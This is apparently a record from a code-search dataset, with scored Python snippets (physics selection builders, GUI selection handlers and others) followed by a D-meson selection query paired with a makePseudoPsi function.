StandardParticles import StdAllNoPIDsPions as inpts\n pioncut = self['PionCut']\n else :\n from StandardParticles import StdAllLooseANNPions as inpts\n pioncut = \"(%s)&(%s)\" % ( self['PionCut'] , self['PionPIDCut'] ) \n ##\n return self.make_selection (\n 'Pion' ,\n FilterDesktop ,\n [ inpts ] ,\n Code = pioncut ,\n )", "def include_selection(data, selection):\n\n new_data = list()\n\n for a_data_point in data:\n\n if ('resonance_id' in a_data_point.par and a_data_point.par[\n 'resonance_id'] in selection):\n new_data.append(a_data_point)\n\n return new_data", "def __init__(\n self, name: str, values: List[Dict], index: Optional[int] = 0,\n label: Optional[str] = None, help: Optional[str] = None,\n default: Optional[bool] = None, required: Optional[bool] = False,\n group: Optional[str] = None\n ):\n super(Select, self).__init__(\n dtype=PARA_SELECT,\n name=name,\n index=index,\n label=label,\n help=help,\n default=default,\n required=required,\n group=group\n )\n self.values = values", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def __init__(self):\n super().__init__()\n self.p = 0.0\n self.type = 'Geometric'\n self.distType = 'Discrete'\n self.lowerBound = 0.0\n self.upperBound = 1.0\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def selectPointsUnderCursor(self):\n #spw = self.spw\n #sw = spw.windows['Sort']\n #if clear:\n # sw.uslist.clearSelection()\n # sw.nlist.clearSelection()\n x, y = self.cursorPosGL()\n sids = self.pick(x, y, pb=10, multiple=True)\n if sids == None:\n return\n #t0 = time.time()\n #if not sw.panel.maxed_out:\n # spw.SelectSpikes(sids, on=self.selecting)\n #else:\n # # for 
speed, while the mouse is held down and the sort panel is maxed out,\n # # don't call SelectSpikes, only call it once when the mouse is released\n self.collected_sids.append(sids)\n #print('SelectSpikes took %.3f sec' % (time.time()-t0))\n if self.selecting == True:\n sat = 0.2 # desaturate\n else: # self.selecting == False\n sat = 1 # resaturate\n self.color(sids, sat=sat)\n self.updateGL()", "def create_menu():\n MenuData = [\n (\"&Draw Variables\",drawable.ask),\n (\"&Show Variables\",printall),\n (\"&Print Variables\",printval),\n (\"&Edit Variable\",edit),\n (\"&Rename Variable\",rename),\n (\"&Forget Variables\",forget),\n (\"---\",None),\n (\"&Create Plane\",\n [(\"Coordinates\", \n [(\"Point and normal\", createPlaneCoordsPointNormal),\n (\"Three points\", createPlaneCoords3Points),\n ]), \n (\"Visually\", \n [(\"Three points\", createPlaneVisual3Points),\n ]),\n ]),\n (\"&Select Plane\",planes.ask),\n (\"&Draw Selection\",planes.draw),\n (\"&Forget Selection\",planes.forget),\n (\"---\",None),\n (\"&Pick Actors\",pick_actors),\n (\"&Pick Elements\",pick_elements),\n (\"&Pick Points\",pick_points),\n (\"&Pick Edges\",pick_edges),\n (\"---\",None),\n ('&Selection',\n [('&Create Report',report_selection),\n ('&Set Property',setprop_selection),\n ('&Grow',grow_selection),\n ('&Partition',partition_selection),\n ('&Get Partition',get_partition),\n ('&Export',export_selection),\n ]),\n (\"---\",None),\n ('&Query',\n [('&Actors',query_actors),\n ('&Elements',query_elements),\n ('&Points',query_points),\n ('&Edges',query_edges),\n ('&Distances',query_distances),\n ]),\n (\"---\",None),\n (\"&Close\",close_menu),\n ]\n return widgets.Menu('Tools',items=MenuData,parent=GD.gui.menu,before='help')", "def newConnection(self, btnParent = None):\n selected = cmds.ls(selection = True) #current selection\n\n if btnParent != None: #display button\n parent = btnParent\n selected = []\n else: #make parent current tab\n parent = tab = self.tabwidget.currentWidget()\n\n btnColor = self.color.currentText() #button color\n btnName = self.nameBox.text() #button name\n return self.newDragBtn(btnColor, selected, btnName, parent, self.btnWidth.value(), self.btnHeight.value(), self.tabwidget.currentWidget())", "def sir_model():\n ddpp = rmf.DDPP()\n ddpp.add_transition([-1,1,0],lambda x:x[0]+2*x[0]*x[1])\n ddpp.add_transition([0,-1,+1],lambda x:x[1])\n ddpp.add_transition([1,0,-1],lambda x:3*x[2]**3)\n ddpp.set_initial_state([.3,.2,.5]) # We first need to define an initial stater\n return ddpp", "def __getSelectionFilter(self):\n \n selectionPairs = []\n selectionPairs.append(('field','field'))\n selectionPairs.append(('spw','spw'))\n selectionPairs.append(('polarization','correlation'))\n selectionPairs.append(('baseline','antenna'))\n selectionPairs.append(('time','timerange'))\n selectionPairs.append(('scan','scan'))\n selectionPairs.append(('uvdist','uvrange'))\n selectionPairs.append(('scanintent','intent'))\n selectionPairs.append(('observation','observation'))\n return self.__generateFilter(selectionPairs)", "def sel(\n self,\n **kwargs,\n ) -> \"Dataset\":\n res = [da.sel(**kwargs) for da in self]\n return Dataset(data=res, validate=False)", "def PricingStartCurvesVector(builder, numElems):\n return StartCurvesVector(builder, numElems)", "def _get_button_region(self):\n # XXXX Only rectangulars for now\n if not self._sensitive:\n return None\n if not self._insidetemporal():\n return None\n rgn = Qd.NewRgn()\n if self._shape == 'rect':\n x0, y0 = self._convert_point(self._coordinates[0:2])\n x1, y1 = 
self._convert_point(self._coordinates[2:4])\n box = x0, y0, x1, y1\n Qd.RectRgn(rgn, box)\n elif self._shape == 'poly':\n Qd.OpenRgn()\n xl, yl = self._convert_point(self._coordinates[-2:])\n Qd.MoveTo(xl, yl)\n for i in range(0, len(self._coordinates), 2):\n x, y = self._convert_point(self._coordinates[i:i+2])\n Qd.LineTo(x, y)\n Qd.CloseRgn(rgn)\n elif self._shape == 'circle':\n print 'Circle not supported yet'\n elif self._shape == 'ellipse':\n # Note: rx/ry are width/height, not points\n x, y, rx, ry = self._dispobj._window._convert_coordinates(self._coordinates)\n Qd.OpenRgn()\n Qd.FrameOval((x-rx, y-ry, x+rx, y+ry))\n Qd.CloseRgn(rgn)\n else:\n print 'Invalid shape type', self._shape\n return rgn", "def selection(self):\r\n if not self._selection:\r\n print(\"not working\")\r\n return None\r\n\r\n year, month = self._date.year, self._date.month\r\n if len(str(month))==1:\r\n month = \"0{}\".format(month)\r\n return (\"{}{}{}\".format(year, month, self._selection[0]), \r\n \"{} / {} / {}\".format(year, month, self._selection[0]))", "def range(self, event):\r\n \r\n p = (event.x, self.toCartesian(event.y))\r\n \r\n if self.selectedRegion is None:\r\n self.selectedStart = Region(p[X],p[Y], p[X],p[Y])\r\n self.selectedRegion = self.selectedStart.unionPoint(p)\r\n \r\n self.paint()\r\n \r\n # return (node,sub-tree) where sub-tree is True if draining entire tree\r\n # rooted at node. Draw these as shaded red rectangle to identify whole\r\n # sub-tree is selected.\r\n for pair in self.tree.range(self.selectedRegion):\r\n p = pair[0].point\r\n \r\n if pair[1]:\r\n self.canvas.create_rectangle(pair[0].region.x_min, self.toTk(pair[0].region.y_min), \r\n pair[0].region.x_max, self.toTk(pair[0].region.y_max),\r\n fill='Red', stipple='gray12')\r\n else:\r\n self.canvas.create_rectangle(p[X] - BoxSize, self.toTk(p[Y]) - BoxSize, \r\n p[X] + BoxSize, self.toTk(p[Y]) + BoxSize, fill='Red')\r\n\r\n self.queryRect = self.canvas.create_rectangle(self.selectedRegion.x_min, self.toTk(self.selectedRegion.y_min), \r\n self.selectedRegion.x_max, self.toTk(self.selectedRegion.y_max), \r\n outline='Red', dash=(2, 4))", "def ipset_one_x_new():\n x = np.linspace(-3, 3, 11)\n return IPSet(x=x, y=x ** 2, x_new=1)" ]
[ "0.63153064", "0.5997607", "0.5657909", "0.5577311", "0.55091554", "0.5479855", "0.52665573", "0.5263441", "0.51841724", "0.5104352", "0.50552374", "0.49336368", "0.49273384", "0.49023122", "0.4876281", "0.48567244", "0.4838079", "0.48378935", "0.47973046", "0.47966853", "0.47885236", "0.47756404", "0.4732002", "0.47064656", "0.47033882", "0.4684112", "0.46776748", "0.46765655", "0.4668958", "0.46572882", "0.4645869", "0.46425867", "0.4634486", "0.46281308", "0.46130538", "0.46108025", "0.45868474", "0.45774594", "0.45774594", "0.4575116", "0.45629814", "0.45529646", "0.45523158", "0.4550593", "0.45445558", "0.45402125", "0.4531364", "0.4527998", "0.45271552", "0.45211455", "0.45209572", "0.4508082", "0.4505488", "0.4503868", "0.45015427", "0.4500083", "0.4499608", "0.44820884", "0.44782865", "0.4473344", "0.4465156", "0.44634694", "0.4454673", "0.44429997", "0.44306546", "0.44217092", "0.44119287", "0.44084087", "0.44029078", "0.44012365", "0.43855557", "0.43846485", "0.43824124", "0.43763396", "0.43762296", "0.43755993", "0.43751", "0.43635476", "0.43619356", "0.43601176", "0.43601176", "0.43601176", "0.43601176", "0.43601176", "0.43601176", "0.43601176", "0.43601176", "0.43601176", "0.43566158", "0.4355648", "0.43526277", "0.4348245", "0.4346432", "0.43442172", "0.4333623", "0.43322158", "0.43275386", "0.43261766", "0.432205", "0.43213907" ]
0.5291082
6
Create and return a D > D0 pi Selection object.
def makePseudoPsi( name , config , DecayDescriptor , inputSel ) : _daugCuts = "(PT> %(D0PtLoose)s*MeV)" % locals()['config'] _combCuts = "(APT> %(D0PtLoose)s*MeV)" % locals()['config'] _Psi = CombineParticles( DecayDescriptor = DecayDescriptor , DaughtersCuts = { "D0": _daugCuts } , CombinationCut = _combCuts , MotherCut = "(VFASPF(VCHI2PDOF) < 10000)" ) return Selection( name+'Sel', Algorithm = _Psi, RequiredSelections = inputSel )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def makeDstar2D0Pi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def make_selection ( self ,\n tag , \n algotype ,\n inputs , \n *args ,\n **kwargs ) :\n sel_tag = '%s_Selection' % tag\n sel_name = 'Sel%sFor%s' % ( tag , self.name() )\n #\n ## check existing selection\n #\n sel = self._selection ( sel_tag )\n if sel : return sel \n\n #\n ## adjust a bit the arguments\n if not kwargs.has_key('Preambulo') :\n kwargs ['Preambulo' ] = self['Preambulo']\n\n if not kwargs.has_key( 'ParticleCombiners' ) :\n kwargs ['ParticleCombiners'] = { '' : 'LoKi::VertexFitter:PUBLIC' } \n \n # \n ## use \"simple-selection\"\n #\n from PhysSelPython.Wrappers import SimpleSelection\n sel = SimpleSelection (\n sel_name ,\n algotype ,\n inputs , \n *args ,\n **kwargs )\n # \n return self._add_selection( sel_tag , sel )", "def from_selection(cls):\n guid = compas_rhino.select_point()\n return cls.from_guid(guid)", "def create(cls, selection):\n\t\t\n\t\treturn cls({ true_selector: selection, false_selector: Selection.invert(selection) })", "def from_selection(\n class_,\n selection,\n item_class=None,\n ):\n import abjad\n pitch_segment = abjad.PitchSegment.from_selection(selection)\n return class_(\n pitch_segment,\n item_class=item_class,\n )", "def makeDefault(name,inputSel) :\n from Configurables import OfflineVertexFitter\n Detached4mu = CombineParticles(\"Combine\"+name)\n Detached4mu.DecayDescriptor = \"B_s0 -> mu+ mu- mu+ mu-\"\n # Set the OfflineVertexFitter to keep the 4 tracks and not the J/Psi Kstar:\n Detached4mu.addTool( OfflineVertexFitter )\n Detached4mu.ParticleCombiners.update( { \"\" : \"OfflineVertexFitter\"} )\n Detached4mu.OfflineVertexFitter.useResonanceVertex = False\n Detached4mu.ReFitPVs = True\n Detached4mu.DaughtersCuts = { \"mu+\" : \"(TRCHI2DOF < 2.5 ) \"\\\n \" & (MIPCHI2DV(PRIMARY)> 9.)\"}\n \n Detached4mu.CombinationCut = \"(ADAMASS('B_s0')<1000*MeV) \"\\\n \"& (AMAXDOCA('')<0.3*mm)\"\n Detached4mu.MotherCut = \"(VFASPF(VCHI2/VDOF)<9) \"\\\n \"& (BPVDIRA > 0) \"\\\n \"& (BPVVDCHI2>100)\"\\\n \" & (M>4366.3) & (M<6366.3)\"\\\n \"& (BPVIPCHI2()< 25) \"\n \n\n return Selection (name,\n Algorithm = Detached4mu,\n RequiredSelections = inputSel)", "def make_odorant_selector(name):\n return dcc.Input(\n id=\"cid_%s\" % name,\n placeholder=\"Enter a PubChem ID number...\",\n type=\"number\",\n value=None,\n )", "def createSelector(self,type='select',speed=2.0):\n self.selector = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector.hide()\n ival = self.selector.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def __init__(self,initial_v,v_select=0,max_dev_semitones=1):\n self.v=initial_v\n self.v_select=v_select\n self.max_dev_semitones=max_dev_semitones", "def __init__(self):\n super().__init__()\n self.p = 0.0\n self.type = 'Geometric'\n self.distType = 'Discrete'\n self.lowerBound = 0.0\n self.upperBound = 1.0\n self.compatibleQuadrature.append('CDF')\n 
self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self, pvID, pvP, pvQ, pvDescriptor):\n\n # TODO: implement this", "def makeDstarPartial( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def from_selection(cls):\n guid = compas_rhino.select_mesh()\n return cls.from_guid(guid)", "def createSelector2(self,type='select',speed=2.0):\n self.selector2 = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector2.hide()\n ival = self.selector2.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def __init__(self):\n super().__init__()\n self.p = 0.0\n self.type = 'Bernoulli'\n self.distType = 'Discrete'\n self.lowerBound = 0.0\n self.upperBound = 1.0\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self, P, I, D, dt):\n\n\t\tself._Kp = P\n\t\tself._Ki = I\n\t\tself._Kd = D\n\t\tself._dt = dt", "def curve_through_selection(*args):\n sel = cmds.ls(sl=True, fl=True)\n if not sel or len(sel)==1:\n cmds.warning(\"You need to select multiple things to create curve through!\")\n return()\n\n pList = []\n crvType = cmds.radioButtonGrp(widgets[\"crvSelRBG\"], q=True, sl=True)\n\n for obj in sel:\n if cmds.objectType(obj) in [\"transform\"]:\n pos = cmds.xform(obj, q=True, ws=True, rp=True)\n pList.append(pos)\n elif obj in cmds.filterExpand(sm=[28, 30, 31, 32, 34, 46]):\n pos = cmds.pointPosition(obj)\n pList.append(pos)\n\n #add points if only 2 (cv, ep) or 3 (cv) are given, and create the curve\n if crvType == 1:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n if len(pList) == 3:\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n crv = cmds.curve(d=3, p=pList, name=\"newCurve\")\n\n if crvType == 2:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n crv = cmds.curve(d=3, ep=pList, name=\"newCurve\")\n\n return(crv)", "def __init__(\n self, name: str, values: List[Dict], index: Optional[int] = 0,\n label: Optional[str] = None, help: Optional[str] = None,\n default: Optional[bool] = None, required: Optional[bool] = 
False,\n group: Optional[str] = None\n ):\n super(Select, self).__init__(\n dtype=PARA_SELECT,\n name=name,\n index=index,\n label=label,\n help=help,\n default=default,\n required=required,\n group=group\n )\n self.values = values", "def build_selection_spec(client_factory, name):\r\n sel_spec = client_factory.create('ns0:SelectionSpec')\r\n sel_spec.name = name\r\n return sel_spec", "def __init__(self):\n super().__init__()\n self.n = 0.0\n self.p = 0.0\n self.type = 'Binomial'\n self.hasInfiniteBound = True\n self.distType = 'Discrete'\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def select(self):\n\t\tbest_num_components = self.n_constant\n\t\treturn self.base_model(best_num_components)", "def pdos_select(self, atoms=None, spin=None, l=None, m=None):\n valid_m_values = {'s': [],\n 'p': ['x', 'y', 'z'],\n 'd': ['xy', 'yz', 'z2-r2', 'xz', 'x2-y2'],\n 'f': ['y(3x2-y2)', 'xyz', 'yz2', 'z3', 'xz2', 'z(x2-y2)', 'x(x2-3y2)']}\n if not atoms:\n atom_idx = list(range(self.number_of_atoms))\n else:\n atom_idx = atoms\n to_return = self.pdos_raw[atom_idx, :, :, :]\n if not spin:\n spin_idx = list(range(self.ispin))\n elif spin == 'up':\n spin_idx = [0]\n elif spin == 'down':\n spin_idx = [1]\n elif spin == 'both':\n spin_idx = [0, 1]\n else:\n raise ValueError\n to_return = to_return[:, :, :, spin_idx]\n\n if not l:\n channel_idx = list(range(self.number_of_channels))\n elif l == 's':\n channel_idx = [0]\n elif l == 'p':\n if not m:\n channel_idx = [1, 2, 3]\n else:\n channel_idx = [1 + i for i, v in enumerate(valid_m_values['p']) if v in m]\n elif l == 'd':\n if not m:\n channel_idx = [4, 5, 6, 7, 8]\n else:\n channel_idx = [4 + i for i, v in enumerate(valid_m_values['d']) if v in m]\n elif l == 'f':\n if not m:\n channel_idx = [9, 10, 11, 12, 13, 14, 15]\n else:\n channel_idx = [9 + i for i, v in enumerate(valid_m_values['f']) if v in m]\n else:\n raise ValueError\n\n return to_return[:, :, channel_idx, :]", "def __init__(self, parent):\n # parent is the main frame of PyCorrFit\n self.parent = parent\n ## MYID\n # This ID is given by the parent for an instance of this class\n self.MyID = None\n ## Wrapping\n curvedict, labels = self.GetCurvedict()\n self.labels = labels\n self.Selector = UserSelectCurves(parent, curvedict,\n wrapper=self, labels=labels)\n # This is necessary for parent to deselect and select the tool\n # in the tools menu.\n self.Bind = self.Selector.Bind\n if self.parent.notebook.GetPageCount() == 0:\n self.Selector.sp.Disable()", "def __init__(self, p) -> None:\n self._p = p\n self._delegate = TwoQubitAsymmetricDepolarizingChannel(p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15)", "def _an_element_(self):\n from sage.rings.integer_ring import ZZ\n return self(self.realization_of().PD().get_point(ZZ.zero()))", "def 选择项目(self, n): # real signature unknown; restored from __doc__\n return self.Select(n)", "def _select_single(self, disc):\n return QuadraticFieldClassNumbersTable._select_single(self, -disc)", "def __init__(self, r=1, p=3):\n self.p = p\n self.r = r", "def generate_kdtree(self):\n if self.method==2:\n coordinates = self.unassigned_data[0:3,:]\n else:\n coordinates = self.unassigned_data[0:2,:]\n tree = cKDTree(coordinates.T)\n\n return tree", "def make_selection(self, num):\n other_doors = None\n if num is 1:\n other_doors = [str(2), str(3)]\n elif num is 2:\n other_doors = [str(1), str(3)]\n elif num is 3:\n 
other_doors = [str(1), str(2)]\n\n reveal = str(random.choice(other_doors))\n other_doors.remove(reveal)\n third_door = random.choice(other_doors)\n other_doors.remove(third_door)\n\n main_door = getattr(self, 'door' + str(num) + '_counter')\n door_second = getattr(self, 'door' + reveal + '_counter')\n door_third = getattr(self, 'door' + third_door + '_counter')\n main_door_reveal = getattr(self, 'door'+str(num)+'_reveal')\n\n if (main_door is 0 and door_second is 0\n and door_third is 0):\n self.ids['door'+reveal].source = \\\n getattr(self, 'door'+reveal+'_reveal')\n self.ids['button'+reveal].disabled = True\n inc = getattr(self, 'door' + str(num) + '_counter')\n setattr(self, 'door' + str(num) + '_counter', inc + 1)\n elif main_door is 1 and door_second is 0 and door_third is 0:\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()\n elif main_door is 0 and (door_second is 1 or door_third is 1):\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()", "def get_selection():\n\n selected = Gui.Selection.getSelectionEx()[0].SubObjects\n sel_len = len(selected)\n result = SelectionContainer()\n\n for _x in range(0, sel_len):\n\n shape_type = selected[_x].ShapeType\n\n if shape_type == 'Vertex':\n result.vertices.append(selected[_x])\n\n elif shape_type == 'Edge':\n\n if 'Line' in str(selected[_x].Curve):\n result.lines.append(selected[_x])\n else:\n result.curves.append(selected[_x])", "def __init__(self, disk_radius=None, even_sampling=False, no_data_value=None, ignore_labels=None):\n self.disk_radius = disk_radius\n self.ignore_labels = [] if ignore_labels is None else ignore_labels\n self.even_sampling = even_sampling\n self.no_data_value = no_data_value", "def initP0(self, size, radius):\n return h.circle(size, radius)[:, :, 0]", "def selection(self):\n # create an empty priority queue for the new generation\n newGeneration = PriorityQueue()\n # pick top X of the population to survive\n for c in range(0, self.generation.qsize() / SELECTION_FRACTION):\n # get a chromosome\n chromosome = self.generation.get()\n # put the chromosomes in the new generation\n newGeneration.put(chromosome)\n # keep the new generation\n self.generation = newGeneration", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def 
__init__(self, *args, **kwargs):\n _gdi_.PseudoDC_swiginit(self,_gdi_.new_PseudoDC(*args, **kwargs))", "def __init__(self,min_instances=30, drift_level=3.0):\n\n from math import sqrt\n self.min_instances = min_instances\n self.drift_level = float(drift_level)\n self.i = None\n self.pi = None\n self.si = None\n self.pi_min = None\n self.si_min = None\n self.sqrt=sqrt\n self.reset()", "def __init__(self):\n super().__init__()\n self.mu = 0.0\n self.type = 'Poisson'\n self.hasInfiniteBound = True\n self.distType = 'Discrete'\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def _create_example_door():\n return Door({\"warning\": False, \"closed\": True, \"locked\": False})", "def construct_random_initial(self):\n x = np.random.random((self._crv_size, self._bound))\n return x", "def pool_selected( self, object ):\n\t\tud.debug( ud.ADMIN, ud.INFO, 'UVMM.DW.ps(node_uri=%s)' % self.node_uri)\n\t\tpool_name = object.options.get('pool-name')\n\t\tif not pool_name:\n\t\t\tpool_name = object.options['pool-name'] = 'default'\n\t\tdrive_type = object.options['drive-type']\n\t\ttry:\n\t\t\tif drive_type == 'cdrom':\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'cdrom')\n\t\t\telse:\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'disk' )\n\t\texcept uvmmd.UvmmError, e:\n\t\t\tvols = ()\n\t\tud.debug(ud.ADMIN, ud.INFO, 'UVMM.DW.ps: volumes=%s' % map(str, vols))\n\t\tchoices = []\n\t\tfor vol in vols:\n\t\t\tbasename = os.path.basename( vol.source )\n\t\t\tif '.' in basename:\n\t\t\t\tsuffix = basename[ basename.rfind( '.' ) + 1 : ]\n\t\t\t\tif suffix in ( 'xml', 'snapshot' ):\n\t\t\t\t\tcontinue\n\t\t\tchoices.append( basename )\n\t\tchoices.sort()\n\t\tself.image_syntax.update_choices( choices )\n\n\t\t# recreate pool button\n\t\tbtn = self._create_pool_select_button( object.options )\n\t\tself[DriveWizard.PAGE_OLD].options[0] = btn\n\t\tself[DriveWizard.PAGE_NEW].options[0] = btn\n\t\t# recreate driver-type button\n\t\titems = [self[DriveWizard.PAGE_NEW].options[2].id(), self[DriveWizard.PAGE_NEW].options[3].id()]\n\t\tbtn = self._create_type_select_button(object.options, items)\n\t\tself[DriveWizard.PAGE_NEW].options[1] = btn\n\n\t\tif drive_type == 'disk':\n\t\t\tself[DriveWizard.PAGE_OLD].hint = None\n\t\telif drive_type in ( 'cdrom', 'floppy' ):\n\t\t\tif self.image_syntax._choices:\n\t\t\t\tmsg = _( \"If the required image is not found it might be added by copying the file into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\telse:\n\t\t\t\tmsg = _( \"The list of available images is empty! To add an image the file needs to be copied into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. 
The image should now be listed.\" )\n\t\t\tself[DriveWizard.PAGE_OLD].hint = msg\n\t\t\tself[DriveWizard.PAGE_OLD].description = ''\n\t\telse:\n\t\t\traise ValueError('Invalid drive-type \"%s\"' % drive_type)\n\n\t\treturn self.type_selected(object)", "def __make_slide(self):\n # Create base rectangle for slide\n length = self.parameters['slide_base_length'] + self.parameters['bearing_slide_travel']\n width = self.parameters['slide_width']\n height = self.parameters['slide_height']\n slide = fso.Box(x=length,y=width,z=height)\n # Create the mounting holes\n radius = 0.5*self.parameters['slide_screw_size']\n base_hole = fso.Cylinder(r=radius, l=2*height)\n hole_list = []\n for i in (-1,1):\n for j in (-1,1):\n xpos = i*(0.5*length - self.parameters['slide_screw_inset'])\n ypos = j*(0.5*self.parameters['slide_screw_dW'])\n hole = base_hole.copy()\n hole.translate([xpos,ypos,0])\n hole_list.append(hole)\n # Remove hole material\n slide -= hole_list\n slide.set_color(self.slide_color,recursive=True)\n self.slide = slide", "def __init__(self, r1=4.5*0.0254, r2=4.5*0.0254,\n d1=25.0*0.0254, d2=25.0*0.0254,\n Ixx=185000.0*0.45359237*0.0254**2,\n Iyy=185000.0*0.45359237*0.0254**2,\n Izz=3500.0*0.45359237*0.0254**2,):\n self.r1 = r1 # m\n self.r2 = r2 # m\n self.d1 = d1 # m\n self.d2 = d2 # m\n self.Ixx = Ixx # kg-m^2\n self.Iyy = Iyy # kg-m^2\n self.Izz = Izz # kg-m^2", "def selection(self):\n if not self._selection:\n return None\n \n year, month = self._date.year, self._date.month\n return self.datetime(year, month, int(self._selection[0]))", "def _generate_solution(self):\n \n operation_list = []\n available = {job.get_job_id(): [operation for operation in job.get_operations() if operation.get_sequence() == 0] for job in self.jssp_instance_data.jobs} # dictionary of first unprocessed operations of each job\n \n while 0 < len(available):\n rand_job_id = random.choice(list(available.keys()))\n rand_operation = random.choice(available[rand_job_id])\n rand_machine = np.random.choice(rand_operation.get_required_machines())\n\n available[rand_job_id].remove(rand_operation)\n \n if len(available[rand_job_id]) == 0:\n # if selected operation is last operation of the job \n if rand_operation.get_sequence() == self.jssp_instance_data.get_job(rand_job_id).get_max_sequence():\n del available[rand_job_id]\n else:\n available[rand_job_id] = [t for t in self.jssp_instance_data.get_job(rand_job_id).get_operations() if\n t.get_sequence() == rand_operation.get_sequence() + 1]\n\n\n operation_list.append([rand_job_id, rand_operation.get_operation_id(), rand_operation.get_sequence(), rand_machine]) # chromosome representation \n return Solution(self.jssp_instance_data, np.array(operation_list, dtype=np.intc))", "def __init__(self, dict = {}):\r\n if dict == {}:\r\n self.zero_val()\r\n else:\r\n self.piDD = dict\r\n self.top_node = 